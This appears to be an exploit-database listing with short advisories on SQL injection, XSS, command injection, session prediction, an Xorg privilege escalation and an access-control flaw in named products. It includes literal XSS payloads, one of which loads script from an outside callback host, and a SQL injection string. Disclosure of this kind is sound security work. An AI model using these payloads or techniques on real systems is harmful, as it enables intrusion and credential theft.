Explore all Exploits:

HasanMWB 1.0 – SQL Injection

HasanMWB 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can send a malicious HTTP request containing a crafted SQL statement to the vulnerable script and gain access to the database. This can be exploited to extract sensitive information such as usernames and passwords.

Multiple Cross-Site Scripting Vulnerabilities in FreshRSS 1.11.1

Multiple Cross-Site Scripting vulnerabilities were discovered in FreshRSS 1.11.1. Blind Cross-site Scripting, Stored Cross-site Scripting, and Cross-site Scripting vulnerabilities were identified. Attack patterns included %27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt+src%3d%22%2f%2f4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e, '"--></style></scRipt><scRipt>netsparker(0x00139F)</scRipt> and %3ciMg+src%3dN+onerror%3dnetsparker(0x001DCF)%3e.

NUUO NVRMini2 Authenticated Command Injection

Authentication is bypassed by using '||' or '&&' instead of ';' to bypass the filter. A payload is then encoded in HEX to bypass the second filter. The payload is then sent to the 'upload_file.php' page to exploit the vulnerability. If the exploitation is successful, the output will be 'Exploitation successful'.

Dolibarr ERP/CRM <= 8.0.3 - Cross-Site Scripting

Dolibarr ERP & CRM is a modern and easy to use software package to manage your business. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.

KeyBase Botnet v1.5 – SQL Injection Vulnerability

KeyBase Botnet v1.5 is vulnerable to SQL Injection via the 'machinename' GET parameter. An attacker can exploit this vulnerability to gain access to the database and execute malicious SQL queries. The payload used in the PoC is 'type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1'

NEC Univerge Sv9100 WebPro – 6.00.00 / Remote 0day Exploit POC

NEC Univerge WebPro suffers from a 'Predictable Session ID' that can potentially disclose all user account information including passwords stored in clear text in the Web UI. Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords.

AIX Xorg X11 Server – Local Privilege Escalation

Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary file overwrite when the X server is running with elevated privileges. The -logfile argument can be used to overwrite arbitrary files in the file system, due to incorrect checks in the parsing of the option. This is a port of the OpenBSD X11 Xorg exploit to run on AIX. It overwrites /etc/passwd in order to create a new user with root privileges.

Rockwell Automation Allen-Bradley PowerMonitor 1000 – Incorrect Access Control

On the Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, a few buttons are disabled, such as “Edit”, “Remove”, “AddNew”, “Change Policy Holder” and “Security Configuration”. Viewing the source code of the login page shows that those buttons/functions rely only on the “disabled” parameter to control access rights. This allows attackers using a proxy to erase the “disabled” parameter and enable those buttons/functions. Once those buttons/functions are enabled, attackers are able to add a new user who has administrator rights.
